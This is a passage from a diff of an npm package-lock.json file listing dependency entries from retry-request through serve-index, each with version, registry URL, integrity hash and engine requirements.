"sha512-XQBQ3I8W1Cge0Seh+6gjj03LbmRFWuoszgK9ooCpwYIrhhoO80pfq4cUkU5DkknwfOfFteRwlZ56PYOGYyFWdg==", + "engines": { + "node": ">= 4" + } + }, + "node_modules/retry-as-promised": { + "version": "7.0.4", + "resolved": "https://registry.npmjs.org/retry-as-promised/-/retry-as-promised-7.0.4.tgz", + "integrity": "sha512-XgmCoxKWkDofwH8WddD0w85ZfqYz+ZHlr5yo+3YUCfycWawU56T5ckWXsScsj5B8tqUcIG67DxXByo3VUgiAdA==" + }, + "node_modules/retry-request": { + "version": "4.2.2", + "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-4.2.2.tgz", + "integrity": "sha512-xA93uxUD/rogV7BV59agW/JHPGXeREMWiZc9jhcwY4YdZ7QOtC7qbomYg0n4wyk2lJhggjvKvhNX8wln/Aldhg==", + "dependencies": { + "debug": "^4.1.1", + "extend": "^3.0.2" + }, + "engines": { + "node": ">=8.10.0" + } + }, + "node_modules/reusify": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/reusify/-/reusify-1.0.4.tgz", + "integrity": "sha512-U9nH88a3fc/ekCF1l0/UP1IosiuIjyTh7hBvXVMHYgVcfGvt897Xguj2UOLDeI5BG2m7/uwyaLVT6fbtCwTyzw==", + "engines": { + "iojs": ">=1.0.0", + "node": ">=0.10.0" + } + }, + "node_modules/rfdc": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/rfdc/-/rfdc-1.3.0.tgz", + "integrity": "sha512-V2hovdzFbOi77/WajaSMXk2OLm+xNIeQdMMuB7icj7bk6zi2F8GGAxigcnDFpJHbNyNcgyJDiP+8nOrY5cZGrA==", + "dev": true + }, + "node_modules/rndm": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/rndm/-/rndm-1.2.0.tgz", + "integrity": "sha1-8z/pz7Urv9UgqhgyO8ZdsRCht2w=" + }, + "node_modules/route-recognizer": { + "version": "0.3.4", + "resolved": "https://registry.npmjs.org/route-recognizer/-/route-recognizer-0.3.4.tgz", + "integrity": "sha512-2+MhsfPhvauN1O8KaXpXAOfR/fwe8dnUXVM+xw7yt40lJRfPVQxV6yryZm0cgRvAj5fMF/mdRZbL2ptwbs5i2g==", + "dev": true + }, + "node_modules/run-applescript": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/run-applescript/-/run-applescript-7.0.0.tgz", + "integrity": "sha512-9by4Ij99JUr/MCFBUkDKLWK3G9HVXmabKz9U5MlIAIuvuzkiOicRYs8XJLxX+xahD+mLiiCYDqF9dKAgtzKP1A==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/run-parallel": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/run-parallel/-/run-parallel-1.2.0.tgz", + "integrity": "sha512-5l4VyZR86LZ/lDxZTR6jqL8AFE2S0IFLMP26AbjsLVADxHdhB/c0GUsH+y39UfCi3dzz8OlQuPmnaJOMoDHQBA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "queue-microtask": "^1.2.2" + } + }, + "node_modules/rxjs": { + "version": "7.5.5", + "resolved": "https://registry.npmjs.org/rxjs/-/rxjs-7.5.5.tgz", + "integrity": "sha512-sy+H0pQofO95VDmFLzyaw9xNJU4KTRSwQIGM6+iG3SypAtCiLDzpeG8sJrNCWn2Up9km+KhkvTdbkrdy+yzZdw==", + "dev": true, + "dependencies": { + "tslib": "^2.1.0" + } + }, + "node_modules/safe-array-concat": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/safe-array-concat/-/safe-array-concat-1.1.2.tgz", + "integrity": "sha512-vj6RsCsWBCf19jIeHEfkRMw8DPiBb+DMXklQ/1SGDHOMlHdPUkZXFQ2YdplS23zESTijAcurb1aSgJA3AgMu1Q==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "get-intrinsic": "^1.2.4", + "has-symbols": "^1.0.3", + "isarray": "^2.0.5" + }, + "engines": { + "node": ">=0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/safe-buffer": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", + "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" + }, + "node_modules/safe-json-stringify": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/safe-json-stringify/-/safe-json-stringify-1.2.0.tgz", + "integrity": "sha512-gH8eh2nZudPQO6TytOvbxnuhYBOvDBBLW52tz5q6X58lJcd/tkmqFR+5Z9adS8aJtURSXWThWy/xJtJwixErvg==", + "optional": true + }, + "node_modules/safe-regex": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/safe-regex/-/safe-regex-1.1.0.tgz", + "integrity": "sha512-aJXcif4xnaNUzvUuC5gcb46oTS7zvg4jpMTnuqtrEPlR3vFr4pxtdTwaF1Qs3Enjn9HK+ZlwQui+a7z0SywIzg==", + "dev": true, + "dependencies": { + "ret": "~0.1.10" + } + }, + "node_modules/safe-regex-test": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/safe-regex-test/-/safe-regex-test-1.0.3.tgz", + "integrity": "sha512-CdASjNJPvRa7roO6Ra/gLYBTzYzzPyyBXxIMdGW3USQLyjWEls2RgW5UBTXaQVp+OrpeCK3bLem8smtmheoRuw==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.6", + "es-errors": "^1.3.0", + "is-regex": "^1.1.4" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/safer-buffer": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", + "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" + }, + "node_modules/saml": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/saml/-/saml-3.0.1.tgz", + "integrity": "sha512-bOjVqZcHY8PkdTBD7Y27KHykC7403BEM46SeCq5r0QPNEPE7M7RmWKy7hPjYsID9VNkCNSHYSVrrRS8Y9hNVWA==", + "dependencies": { + "@xmldom/xmldom": "^0.7.4", + "async": "^3.2.4", + "moment": "^2.29.4", + "valid-url": "~1.0.9", + "xml-crypto": "^2.1.3", + "xml-encryption": "^2.0.0", + "xml-name-validator": "~2.0.1", + "xpath": "0.0.5" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/saml/node_modules/xml-crypto": { + "version": "2.1.6", + "resolved": "https://registry.npmjs.org/xml-crypto/-/xml-crypto-2.1.6.tgz", + "integrity": "sha512-jjvpO8vHNV8QFhW5bMypP+k4BjBqHe/HrpIwpPcdUnUTIJakSIuN96o3Sdah4tKu2z64kM/JHEH8iEHGCc6Gyw==", + "license": "MIT", + "dependencies": { + "@xmldom/xmldom": "^0.7.9", + "xpath": "0.0.32" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/saml/node_modules/xml-crypto/node_modules/xpath": { + "version": "0.0.32", + "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.32.tgz", + "integrity": "sha512-rxMJhSIoiO8vXcWvSifKqhvV96GjiD5wYb8/QHdoRyQvraTpp4IEv944nhGausZZ3u7dhQXteZuZbaqfpB7uYw==", + "license": "MIT", + "engines": { + "node": ">=0.6.0" + } + }, + "node_modules/saml/node_modules/xml-name-validator": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/xml-name-validator/-/xml-name-validator-2.0.1.tgz", + "integrity": "sha512-jRKe/iQYMyVJpzPH+3HL97Lgu5HrCfii+qSo+TfjKHtOnvbnvdVfMYrn9Q34YV81M2e5sviJlI6Ko9y+nByzvA==" + }, + "node_modules/samlp": { + "version": "7.0.2", + "resolved": "https://registry.npmjs.org/samlp/-/samlp-7.0.2.tgz", + "integrity": "sha512-ajROyMKj4HKqXEbThx5ktsMWRsIGziAWWgh9ObnzobUJgCObSUPB13KM9G50huIQffMy3lXx87JDhzYXg5iJ5A==", + "dependencies": { + "@auth0/thumbprint": "0.0.6", + "@auth0/xmldom": "0.1.21", + "auth0-id-generator": "^0.2.0", + "ejs": "^3.1.8", + "flowstate": "^0.4.0", + "querystring": "^0.2.0", + "saml": "^3.0.1", + "xml-crypto": "^2.0.0", + "xpath": "0.0.5", + "xtend": "^1.0.3" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/samlp/node_modules/xml-crypto": { + "version": "2.1.6", + "resolved": "https://registry.npmjs.org/xml-crypto/-/xml-crypto-2.1.6.tgz", + "integrity": "sha512-jjvpO8vHNV8QFhW5bMypP+k4BjBqHe/HrpIwpPcdUnUTIJakSIuN96o3Sdah4tKu2z64kM/JHEH8iEHGCc6Gyw==", + "license": "MIT", + "dependencies": { + "@xmldom/xmldom": "^0.7.9", + "xpath": "0.0.32" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/samlp/node_modules/xml-crypto/node_modules/xpath": { + "version": "0.0.32", + "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.32.tgz", + "integrity": "sha512-rxMJhSIoiO8vXcWvSifKqhvV96GjiD5wYb8/QHdoRyQvraTpp4IEv944nhGausZZ3u7dhQXteZuZbaqfpB7uYw==", + "license": "MIT", + "engines": { + "node": ">=0.6.0" + } + }, + "node_modules/samlp/node_modules/xtend": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/xtend/-/xtend-1.0.3.tgz", + "integrity": "sha1-P12Tc1PM7Y4IU5mlY/2yJUHClgo=", + "engines": { + "node": ">=0.4" + } + }, + "node_modules/sandboxed-module": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/sandboxed-module/-/sandboxed-module-2.0.4.tgz", + "integrity": "sha512-AwEPOdO8mg/wJjr876yCHP2DHqVN0MaggEXhp6IIf3bcI5cYoQl9QrrCHSrvToHjvdEiS5x4TVZRgjD2bEmNTA==", + "dev": true, + "dependencies": { + "require-like": "0.1.2", + "stack-trace": "0.0.9" + } + }, + "node_modules/sanitize-html": { + "version": "2.12.1", + "resolved": "https://registry.npmjs.org/sanitize-html/-/sanitize-html-2.12.1.tgz", + "integrity": "sha512-Plh+JAn0UVDpBRP/xEjsk+xDCoOvMBwQUf/K+/cBAVuTbtX8bj2VB7S1sL1dssVpykqp0/KPSesHrqXtokVBpA==", + "dependencies": { + "deepmerge": "^4.2.2", + "escape-string-regexp": "^4.0.0", + "htmlparser2": "^8.0.0", + "is-plain-object": "^5.0.0", + "parse-srcset": "^1.0.2", + "postcss": "^8.3.11" + } + }, + "node_modules/sanitize-html/node_modules/dom-serializer": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/dom-serializer/-/dom-serializer-2.0.0.tgz", + "integrity": "sha512-wIkAryiqt/nV5EQKqQpo3SToSOV9J0DnbJqwK7Wv/Trc92zIAYZ4FlMu+JPFW1DfGFt81ZTCGgDEabffXeLyJg==", + "dependencies": { + "domelementtype": "^2.3.0", + "domhandler": "^5.0.2", + "entities": "^4.2.0" + }, + "funding": { + "url": "https://github.com/cheeriojs/dom-serializer?sponsor=1" + } + }, + "node_modules/sanitize-html/node_modules/domhandler": { + "version": "5.0.3", + "resolved": "https://registry.npmjs.org/domhandler/-/domhandler-5.0.3.tgz", + "integrity": "sha512-cgwlv/1iFQiFnU96XXgROh8xTeetsnJiDsTc7TYCLFd9+/WNkIqPTxiM/8pSd8VIrhXGTf1Ny1q1hquVqDJB5w==", + "dependencies": { + "domelementtype": "^2.3.0" + }, + "engines": { + "node": ">= 4" + }, + "funding": { + "url": "https://github.com/fb55/domhandler?sponsor=1" + } + }, + "node_modules/sanitize-html/node_modules/domutils": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/domutils/-/domutils-3.0.1.tgz", + "integrity": "sha512-z08c1l761iKhDFtfXO04C7kTdPBLi41zwOZl00WS8b5eiaebNpY00HKbztwBq+e3vyqWNwWF3mP9YLUeqIrF+Q==", + "dependencies": { + "dom-serializer": "^2.0.0", + "domelementtype": "^2.3.0", + "domhandler": "^5.0.1" + }, + "funding": { + "url": "https://github.com/fb55/domutils?sponsor=1" + } + }, + "node_modules/sanitize-html/node_modules/entities": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/entities/-/entities-4.4.0.tgz", + "integrity": "sha512-oYp7156SP8LkeGD0GF85ad1X9Ai79WtRsZ2gxJqtBuzH+98YUV6jkHEKlZkMbcrjJjIVJNIDP/3WL9wQkoPbWA==", + "engines": { + "node": ">=0.12" + }, + "funding": { + "url": "https://github.com/fb55/entities?sponsor=1" + } + }, + "node_modules/sanitize-html/node_modules/htmlparser2": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/htmlparser2/-/htmlparser2-8.0.1.tgz", + "integrity": "sha512-4lVbmc1diZC7GUJQtRQ5yBAeUCL1exyMwmForWkRLnwyzWBFxN633SALPMGYaWZvKe9j1pRZJpauvmxENSp/EA==", + "funding": [ + "https://github.com/fb55/htmlparser2?sponsor=1", + { + "type": "github", + "url": "https://github.com/sponsors/fb55" + } + ], + "dependencies": { + "domelementtype": "^2.3.0", + "domhandler": "^5.0.2", + "domutils": "^3.0.1", + "entities": "^4.3.0" + } + }, + "node_modules/sanitize-html/node_modules/is-plain-object": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", + "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/sass": { + "version": "1.77.1", + "resolved": "https://registry.npmjs.org/sass/-/sass-1.77.1.tgz", + "integrity": "sha512-OMEyfirt9XEfyvocduUIOlUSkWOXS/LAt6oblR/ISXCTukyavjex+zQNm51pPCOiFKY1QpWvEH1EeCkgyV3I6w==", + "dev": true, + "dependencies": { + "chokidar": ">=3.0.0 <4.0.0", + "immutable": "^4.0.0", + "source-map-js": ">=0.6.2 <2.0.0" + }, + "bin": { + "sass": "sass.js" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/sass-loader": { + "version": "14.2.1", + "resolved": "https://registry.npmjs.org/sass-loader/-/sass-loader-14.2.1.tgz", + "integrity": "sha512-G0VcnMYU18a4N7VoNDegg2OuMjYtxnqzQWARVWCIVSZwJeiL9kg8QMsuIZOplsJgTzZLF6jGxI3AClj8I9nRdQ==", + "dev": true, + "dependencies": { + "neo-async": "^2.6.2" + }, + "engines": { + "node": ">= 18.12.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "@rspack/core": "0.x || 1.x", + "node-sass": "^4.0.0 || ^5.0.0 || ^6.0.0 || ^7.0.0 || ^8.0.0 || ^9.0.0", + "sass": "^1.3.0", + "sass-embedded": "*", + "webpack": "^5.0.0" + }, + "peerDependenciesMeta": { + "@rspack/core": { + "optional": true + }, + "node-sass": { + "optional": true + }, + "sass": { + "optional": true + }, + "sass-embedded": { + "optional": true + }, + "webpack": { + "optional": true + } + } + }, + "node_modules/sax": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/sax/-/sax-1.2.1.tgz", + "integrity": "sha1-e45lYZCyKOgaZq6nSEgNgozS03o=" + }, + "node_modules/saxes": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/saxes/-/saxes-5.0.1.tgz", + "integrity": "sha512-5LBh1Tls8c9xgGjw3QrMwETmTMVk0oFgvrFSvWx62llR2hcEInrKNZ2GZCCuuy2lvWrdl5jhbpeqc5hRYKFOcw==", + "dev": true, + "dependencies": { + "xmlchars": "^2.2.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/scheduler": { + "version": "0.20.2", + "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.20.2.tgz", + "integrity": "sha512-2eWfGgAqqWFGqtdMmcL5zCMK1U8KlXv8SQFGglL3CEtd0aDVDWgeF/YoCmvln55m5zSk3J/20hTaSBeSObsQDQ==", + "dependencies": { + "loose-envify": "^1.1.0", + "object-assign": "^4.1.1" + } + }, + "node_modules/schema-utils": { + "version": "3.3.0", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-3.3.0.tgz", + "integrity": "sha512-pN/yOAvcC+5rQ5nERGuwrjLlYvLTbCibnZ1I7B1LaiAz9BRBlE9GMgE/eqV30P7aJQUf7Ddimy/RsbYO/GrVGg==", + "dev": true, + "dependencies": { + "@types/json-schema": "^7.0.8", + "ajv": "^6.12.5", + "ajv-keywords": "^3.5.2" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/scroll-into-view-if-needed": { + "version": "2.2.28", + "resolved": "https://registry.npmjs.org/scroll-into-view-if-needed/-/scroll-into-view-if-needed-2.2.28.tgz", + "integrity": "sha512-8LuxJSuFVc92+0AdNv4QOxRL4Abeo1DgLnGNkn1XlaujPH/3cCFz3QI60r2VNu4obJJROzgnIUw5TKQkZvZI1w==", + "dev": true, + "dependencies": { + "compute-scroll-into-view": "^1.0.17" + } + }, + "node_modules/select-hose": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/select-hose/-/select-hose-2.0.0.tgz", + "integrity": "sha512-mEugaLK+YfkijB4fx0e6kImuJdCIt2LxCRcbEYPqRGCs4F2ogyfZU5IAZRdjCP8JPq2AtdNoC/Dux63d9Kiryg==", + "dev": true, + "license": "MIT" + }, + "node_modules/selfsigned": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/selfsigned/-/selfsigned-2.4.1.tgz", + "integrity": "sha512-th5B4L2U+eGLq1TVh7zNRGBapioSORUeymIydxgFpwww9d2qyKvtuPU2jJuHvYAwwqi2Y596QBL3eEqcPEYL8Q==", + "dependencies": { + "@types/node-forge": "^1.3.0", + "node-forge": "^1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/semver": { + "version": "6.3.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", + "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", + "dev": true, + "bin": { + "semver": "bin/semver.js" + } + }, + "node_modules/send": { + "version": "0.19.0", + "resolved": "https://registry.npmjs.org/send/-/send-0.19.0.tgz", + "integrity": "sha512-dW41u5VfLXu8SJh5bwRmyYUbAoSB3c9uQh6L8h/KtsFREPWpbX1lrljJo186Jc4nmci/sGUZ9a0a0J2zgfq2hw==", + "dependencies": { + "debug": "2.6.9", + "depd": "2.0.0", + "destroy": "1.2.0", + "encodeurl": "~1.0.2", + "escape-html": "~1.0.3", + "etag": "~1.8.1", + "fresh": "0.5.2", + "http-errors": "2.0.0", + "mime": "1.6.0", + "ms": "2.1.3", + "on-finished": "2.4.1", + "range-parser": "~1.2.1", + "statuses": "2.0.1" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/send/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/send/node_modules/debug/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==" + }, + "node_modules/send/node_modules/depd": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/send/node_modules/mime": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/mime/-/mime-1.6.0.tgz", + "integrity": "sha512-x0Vn8spI+wuJ1O6S7gnbaQg8Pxh4NNHb7KSINmEWKiPE4RKOplvijn+NkmYmmRgP68mc70j2EbeTFRsrswaQeg==", + "bin": { + "mime": "cli.js" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/send/node_modules/on-finished": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz", + "integrity": "sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg==", + "dependencies": { + "ee-first": "1.1.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/send/node_modules/statuses": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/statuses/-/statuses-2.0.1.tgz", + "integrity": "sha512-RwNA9Z/7PrK06rYLIzFMlaF+l73iwpzsqRIFgbMLbTcLD6cOao82TaWefPXQvB2fOC4AjuYSEndS7N/mTCbkdQ==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/sequelize": { + "version": "6.31.0", + "resolved": "https://registry.npmjs.org/sequelize/-/sequelize-6.31.0.tgz", + "integrity": "sha512-nCPVtv+QydBmb3Us2jCNAr1Dx3gST83VZxxrUQn/JAVFCOrmYOgUaPUz5bevummyNf30zfHsZhIKYAOD3ULfTA==", + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/sequelize" + } + ], + "dependencies": { + "@types/debug": "^4.1.7", + "@types/validator": "^13.7.1", + "debug": "^4.3.3", + "dottie": "^2.0.2", + "inflection": "^1.13.2", + "lodash": "^4.17.21", + "moment": "^2.29.1", + "moment-timezone": "^0.5.35", + "pg-connection-string": "^2.5.0", + "retry-as-promised": "^7.0.3", + "semver": "^7.3.5", + "sequelize-pool": "^7.1.0", + "toposort-class": "^1.0.1", + "uuid": "^8.3.2", + "validator": "^13.7.0", + "wkx": "^0.5.0" + }, + "engines": { + "node": ">=10.0.0" + }, + "peerDependenciesMeta": { + "ibm_db": { + "optional": true + }, + "mariadb": { + "optional": true + }, + "mysql2": { + "optional": true + }, + "oracledb": { + "optional": true + }, + "pg": { + "optional": true + }, + "pg-hstore": { + "optional": true + }, + "snowflake-sdk": { + "optional": true + }, + "sqlite3": { + "optional": true + }, + "tedious": { + "optional": true + } + } + }, + "node_modules/sequelize-cli": { + "version": "6.6.0", + "resolved": "https://registry.npmjs.org/sequelize-cli/-/sequelize-cli-6.6.0.tgz", + "integrity": "sha512-FwTClhGRvXKanFRHMZbgfXOBV8UC2B3VkE0WOdW1n39/36PF4lWyurF95f246une/V4eaO3a7/Ywvy++3r+Jmg==", + "dev": true, + "dependencies": { + "cli-color": "^2.0.3", + "fs-extra": "^9.1.0", + "js-beautify": "^1.14.5", + "lodash": "^4.17.21", + "resolve": "^1.22.1", + "umzug": "^2.3.0", + "yargs": "^16.2.0" + }, + "bin": { + "sequelize": "lib/sequelize", + "sequelize-cli": "lib/sequelize" + }, + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/sequelize-cli/node_modules/fs-extra": { + "version": "9.1.0", + "resolved": "https://registry.npmjs.org/fs-extra/-/fs-extra-9.1.0.tgz", + "integrity": "sha512-hcg3ZmepS30/7BSFqRvoo3DOMQu7IjqxO5nCDt+zM9XWjb33Wg7ziNT+Qvqbuc3+gWpzO02JubVyk2G4Zvo1OQ==", + "dev": true, + "dependencies": { + "at-least-node": "^1.0.0", + "graceful-fs": "^4.2.0", + "jsonfile": "^6.0.1", + "universalify": "^2.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/sequelize-cli/node_modules/yargs": { + "version": "16.2.0", + "resolved": "https://registry.npmjs.org/yargs/-/yargs-16.2.0.tgz", + "integrity": "sha512-D1mvvtDG0L5ft/jGWkLpG1+m0eQxOfaBvTNELraWj22wSVUMWxZUvYgJYcKh6jGGIkJFhH4IZPQhR4TKpc8mBw==", + "dev": true, + "dependencies": { + "cliui": "^7.0.2", + "escalade": "^3.1.1", + "get-caller-file": "^2.0.5", + "require-directory": "^2.1.1", + "string-width": "^4.2.0", + "y18n": "^5.0.5", + "yargs-parser": "^20.2.2" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/sequelize-pool": { + "version": "7.1.0", + "resolved": "https://registry.npmjs.org/sequelize-pool/-/sequelize-pool-7.1.0.tgz", + "integrity": "sha512-G9c0qlIWQSK29pR/5U2JF5dDQeqqHRragoyahj/Nx4KOOQ3CPPfzxnfqFPCSB7x5UgjOgnZ61nSxz+fjDpRlJg==", + "engines": { + "node": ">= 10.0.0" + } + }, + "node_modules/sequelize/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/sequelize/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/sequelize/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/sequelize/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/serialize-javascript": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/serialize-javascript/-/serialize-javascript-6.0.2.tgz", + "integrity": "sha512-Saa1xPByTTq2gdeFZYLLo+RFE35NHZkAbqZeWNd3BpzppeVisAqpDjcp8dyf6uIvEqJRd46jemmyA4iFIeVk8g==", + "dev": true, + "license": "BSD-3-Clause", + "dependencies": { + "randombytes": "^2.1.0" + } + }, + "node_modules/serialize-javascript/node_modules/randombytes": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/randombytes/-/randombytes-2.1.0.tgz", + "integrity": "sha512-vYl3iOX+4CKUWuxGi9Ukhie6fsqXqS9FE2Zaic4tNFD2N2QQaXOMFbuKK4QmDHC0JO6B1Zp41J0LpT0oR68amQ==", + "dev": true, + "dependencies": { + "safe-buffer": "^5.1.0" + } + }, + "node_modules/serve-index": { + "version": "1.9.1", + "resolved": "https://registry.npmjs.org/serve-index/-/serve-index-1.9.1.tgz", + "integrity": "sha512-pXHfKNP4qujrtteMrSBb0rc8HJ9Ms/GrXwcUtUtD5s4ewDJI8bT3Cz2zTVRMKtri49pLx2e0Ya8ziP5Ya2pZZw==", + "dev": true, + "license": "MIT", + "dependencies": { + "accepts": "~1.3.4", + "batch": "0.6.1", + "debug": "2.6.9", + "escape-html": "~1.0.3", + "http-errors": "~1.6.2", + "mime-types": "~2.1.17", + "parseurl": "~1.3.2" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/serve-index/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/serve-index/node_modules/http-errors": { + "version": "1.6.3", + "resolved": "https://registry.npmjs.org/http-errors/-/http-errors-1.6.3.tgz", + "integrity": "sha512-lks+lVC8dgGyh97jxvxeYTWQFvh4uw4yC12gVl63Cg30sjPX4wuGcdkICVXDAESr6OJGjqGA8Iz5mkeN6zlD7A==", + "dev": true, + "license": "MIT", + "dependencies": { + "depd": "~1.1.2", + "inherits": "2.0.3", + "setprototypeof": "1.1.0", + "statuses": ">= 1.4.0 < 2" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/serve-index/node_modules/inherits": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.3.tgz", + "integrity": "sha512-x00IRNXNy63jwGkJmzPigoySHbaqpNuzKbBOmzK+g2OdZpQ9w+sxCN+VSB3ja7IAge2OP2qpfxTjeNcyjmW1uw==", + "dev": true, + "license": "ISC" + }, + 